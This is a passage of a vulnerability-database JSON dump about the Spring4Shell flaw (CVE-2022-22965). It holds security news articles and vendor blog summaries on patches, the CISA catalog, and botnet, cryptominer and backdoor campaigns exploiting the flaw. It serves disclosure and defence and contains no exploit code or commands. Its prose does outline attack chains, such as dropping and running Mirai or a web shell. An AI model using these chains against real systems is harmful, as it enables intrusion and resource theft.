'max_version': '21.12.1', 'fixed_version' : '21.12.7' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhWlwJSeK-UN5NDOjiAywASbd_85nVwwTSZ4p8416Nk2RzVheiZQZRoJ5feUk8aU4hPOqPbLeoQN6jMQxYXE9wZB1Tz_HjYFDEo_gzhIQz0vrVA0tBuh4Plkfo8LRfEkUpX-to0flLTfnMNB0JmxRQsmswCA5bl1WedSRcYO93Vy5C1Y9lZXBeiRxfE/s728-e100/patch.jpg>)\n\nThe maintainers of Spring Framework have released an emergency patch to address a newly disclosed [remote code execution flaw](<https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html>) that, if successfully exploited, could allow an unauthenticated attacker to take control of a targeted system.\n\nTracked as [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), the high-severity flaw impacts Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and other older, unsupported versions. Users are recommended to upgrade to versions 5.3.18 or later and 5.2.20 or later.\n\nThe Spring Framework is a Java framework that offers infrastructure support to develop web applications.\n\n\"The vulnerability impacts Spring [MVC](<https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller>) [model\u2013view\u2013controller] and Spring WebFlux applications running on [Java Development Kit] 9+,\" Rossen Stoyanchev of Spring.io [said](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) in an advisory published Thursday.\n\n\"The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e., the default, it is not vulnerable to the exploit,\" Stoyanchev added.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>).\n\nThat said, Spring.io warned that the \"nature of the vulnerability is more general\" and that there could be other ways to weaponize the flaw that has not come to light.\n\nThe patch arrives as a Chinese-speaking researcher briefly published a GitHub commit that contained proof-of-concept (PoC) exploit code for CVE-2022-22965 on March 30, 2022, before it was taken down.\n\nSpring.io, a subsidiary of VMware, noted that it was first alerted to the vulnerability \"late on Tuesday evening, close to midnight, GMT time by codeplutos, meizjm3i of AntGroup FG Security Lab.\" It also credited cybersecurity firm Praetorian for reporting the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:35:00", "type": "thn", "title": "Security Patch Releases for Critical Zero-Day Bug in Java Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T03:15:06", "id": "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "href": "https://thehackernews.com/2022/03/security-patch-releases-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiQLJsA4VqLU_2Ko5mgCsWlJMIvwJT2aoEwLoOKMLxy58CeNKOGs27Dp9UfziDFWzjBdovG_PWvQNtsSMBZo4TPOTCJEfeBa3iT0K6lhdquC_6NlvR1qkZoGlYQfXgCwTDOk-gGVKSHY_iHWYSwCWPKdbGNIFo7sFQcS8GrfaN9XAP9-OcC3-Q64mup/s728-e100/crypto-mining.jpg>)\n\nLemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign.\n\n\"It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,\" CrowdStrike [said](<https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/>) in a new report. \"It evades detection by targeting Alibaba Cloud's monitoring service and disabling it.\"\n\nKnown to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.\n\n\"It uses a wide range of spreading mechanisms \u2014 phishing emails, exploits, USB devices, brute force, among others \u2014 and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,\" Microsoft [detailed](<https://thehackernews.com/2021/07/microsoft-warns-of-lemonduck-malware.html>) in a technical write-up of the malware last July. \n\nIn early 2021, attack chains involving LemonDuck [leveraged](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) the then newly patched [Exchange Server vulnerabilities](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.\n\nThe latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that's disguised as a harmless PNG image file from a remote server.\n\nAn analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnepqytFGyLXQ-se6LSQbD8dcaKtmXDuAVuPCd_sPXu7Yx48Lz-oOWavHaLTuVfJs51onI2dx2vm_sbhMbEMBmlmxd2VKQlwVynElKDwR3CU4NPjtYhIE7eAKStI5X-t0n_wmahvr1LKomSVvdEsfaiHUYHz1dDW2dYzUEwbyQLlaW27yosLkpLVHy/s728-e100/docker.jpg>)\n\nThe dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.\n\nWith [compromised cloud instances](<https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html>) becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain.\n\n### TeamTNT targets AWS, Alibaba Cloud\n\nThe disclosure comes as Cisco Talos exposed the toolset of a cybercrime group named TeamTNT, which has a history of targeting cloud infrastructure for cryptojacking and placing backdoors.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6dfAwirfE8zK8lIvO9C83J02rpPa4oqENbHyfJRLj36q8mg1qdWQazJucqou991fXw6Xt6GyN-cLDDFrr2CAxKN7qIC4HXZI2r7XKpG_vwbA5MggiCzUCWAs0-mSkJ6kbK3Dz00BVEgGS5JmJphX1B9Igew8fq9dCPv_WDqWCupPxoaYwe4nSYro3/s728-e100/code.jpg>)\n\nThe malware payloads, which are said to have been modified in response to [previous public disclosures](<https://www.trendmicro.com/en_us/research/21/c/teamtnt-continues-attack-on-the-cloud--targets-aws-credentials.html>), are primarily designed to target Amazon Web Services (AWS) while simultaneously focused on cryptocurrency mining, persistence, lateral movement, and disabling cloud security solutions.\n\n\"Cybercriminals who are outed by security researchers must update their tools in order to continue to operate successfully,\" Talos researcher Darin Smith [said](<https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html>).\n\n\"The tools used by TeamTNT demonstrate that cybercriminals are increasingly comfortable attacking modern environments such as Docker, Kubernetes, and public cloud providers, which have traditionally been avoided by other cybercriminals who have instead focused on on-premise or mobile environments.\"\n\n### Spring4Shell exploited for cryptocurrency mining\n\nThat's not all. In yet another instance of how threat actors quickly co-opt newly disclosed flaws into their attacks, the critical remote code execution bug in Spring Framework ([CVE-2022-22965](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>)) has been weaponized to deploy cryptocurrency miners.\n\nThe exploitation attempts make use of a custom web shell to deploy the cryptocurrency miners, but not before turning off the firewall and terminating other virtual currency miner processes.\n\n\"These cryptocurrency miners have the potential to affect a large number of users, especially since Spring is the most widely used framework for developing enterprise-level applications in Java,\" Trend Micro researchers Nitesh Surana and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T09:30:00", "type": "thn", "title": "Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-22T09:30:49", "id": "THN:8FDA592D55831C1C4E3583B81FABA962", "href": "https://thehackernews.com/2022/04/watch-out-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:29", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh12dL7ICi8BzkoVRiKbx2OSWekbI0DsSUJej7yknw_QwT_Qbim9vL4F3zob65jCAK8C1Fh19m0emVWE1LHS-mgk8ALDqg0RZd4nQS4V4rH-wQIaAWve3Ddp3SlOgAmzJBcDiQWx3p3Oy0IEqk0-om-yo0-rV9sacfjd9WsCE8ZPI73d01olPBIkL0K/s728-e100/mirai-okiru-iot-botnet-elf-malware-arc-cpu.png>)\n\nThe recently disclosed critical **Spring4Shell** vulnerability is being actively exploited by threat actors to execute the [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) [botnet malware](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>), particularly in the Singapore region since the start of April 2022.\n\n\"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using ['chmod](<https://en.wikipedia.org/wiki/Chmod>),'\" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) in a report published Friday.\n\nTracked as [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week [added](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>) the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on \"evidence of active exploitation.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEio8WhSw-QIpeEhZEzpG6ZbweArmP6HTh3N5WuvSTrKDdlQum-IR2xuoGvt9gCWRpkFXtwmc0B-pNR-Mt9w4ut0cD27-gGJDWOM1tOFjlH4c042z40m1FiRMhem_BfeLbF7J7EvdXNoby9MGEvNKe8entBcSRhB4LSooVFeg_PnFi6w9k6cX4udeOvo/s728-e100/exploit.jpg>)\n\nThis is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were [uncovered](<https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts>) leveraging the [Log4Shell vulnerability](<https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html>) to breach susceptible servers on the internet. \n\n[Mirai](<https://en.wikipedia.org/wiki/Mirai_\\(malware\\)>), meaning \"future\" in Japanese, is the name given to a [Linux malware](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) that has continued to target connected smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.\n\nThe IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.\n\nTo make matters worse, the leak of Mirai's source code in [October 2016](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>) has given birth to [numerous variants](<https://thehackernews.com/2020/06/ddos-botnet-hacker-jailed.html>) such as Okiru, Satori, Masuta, and [Reaper](<https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/reaper-botnet/>), making it an ever-mutating threat.\n\n\"The [Mirai] code is so influential that even some of the malware offshoots are starting to have their own code versions released and co-opted by other cybercriminals,\" Intel 471 researchers [said](<https://intel471.com/blog/malware-source-code-leak-history>) last month, pointing out the upload of the [BotenaGo botnet's](<https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github>) source code on GitHub in January 2022.\n\nEarlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with [XOR DDoS](<https://thehackernews.com/2020/06/cryptocurrency-docker-image.html>), Mirai, and [Mozi](<https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html>) malware families accounting for more than 22% of Linux-targeted threats observed in the year.\n\n\"The primary purpose of these malware families is to compromise vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks,\" the researchers [said](<https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-09T05:18:00", "type": "thn", "title": "Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-14T04:20:56", "id": "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "href": "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiJLT66MmOp4XJQPaUVpNaPQ0AnBgbGEXqPHf8RVQPLovMSaeGXsWZRR6c7Dp5sJac6GET2Cl880ZwgRnDP0aQL9WZnlajwakBLIjgTzBT4iQZncAmfkSp_2bc-ToWhkNP9-bwbdNzb417p6KbV4gUpkLSMrmoWNQWhcY6jiJ0JULROrg5f1tjTNJwv/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) based on \"evidence of active exploitation.\"\n\nThe critical severity flaw, assigned the identifier [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8) and dubbed \"Spring4Shell\", impacts Spring model\u2013view\u2013controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman noted last week.\n\nAlthough exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard [said](<https://securityscorecard.com/blog/spring4shell-12-year-old-vulnerability-springs-back-to-life>) \"active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space.\"\n\nSimilar scanning activities have been spotted by [Akamai](<https://www.akamai.com/blog/security/spring-core-spring4shell-zero-day>) and Palo Alto Networks' [Unit42](<https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/>), with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target network.\n\n\"During the first four days after the vulnerability outbreak, 16% of the organizations worldwide were impacted by exploitation attempts,\" Check Point Research [said](<https://blog.checkpoint.com/2022/04/05/16-of-organizations-worldwide-impacted-by-spring4shell-zero-day-vulnerability-exploitation-attempts-since-outbreak/>), adding it detected 37,000 Spring4Shell-related attacks over the weekend.\n\nMicrosoft 365 Defender Threat Intelligence Team also [chimed in](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>), stating it has been \"tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities.\"\n\nAccording to [statistics](<https://www.sonatype.com/resources/springshell-exploit-resource-center>) released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.\n\nCisco, which is [actively investigating](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>) its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -\n\n * Cisco Crosswork Optimization Engine\n * Cisco Crosswork Zero Touch Provisioning (ZTP), and\n * Cisco Edge Intelligence\n\nVMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -\n\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Operations Manager, and\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n\"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>) in the advisory.\n\nAlso added by CISA to the catalog are [two zero-day flaws](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the [Beastmode](<https://thehackernews.com/2022/04/beastmode-ddos-botnet-exploiting-new.html>) Mirai-based DDoS campaign.\n\nPursuant to the Binding Operational Directive (BOD) [issued](<https://www.cisa.gov/binding-operational-directive-22-01>) by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:31:00", "type": "thn", "title": "CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45382", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965"], "modified": "2022-04-06T03:27:40", "id": "THN:9F9D436651F16F99B6EA52F0DB9AE75C", "href": "https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2022-04-08T19:28:48", "description": "We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T00:00:00", "type": "trendmicroblog", "title": "CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "href": "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:36:25", "description": "Recently, we observed attempts to exploit the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 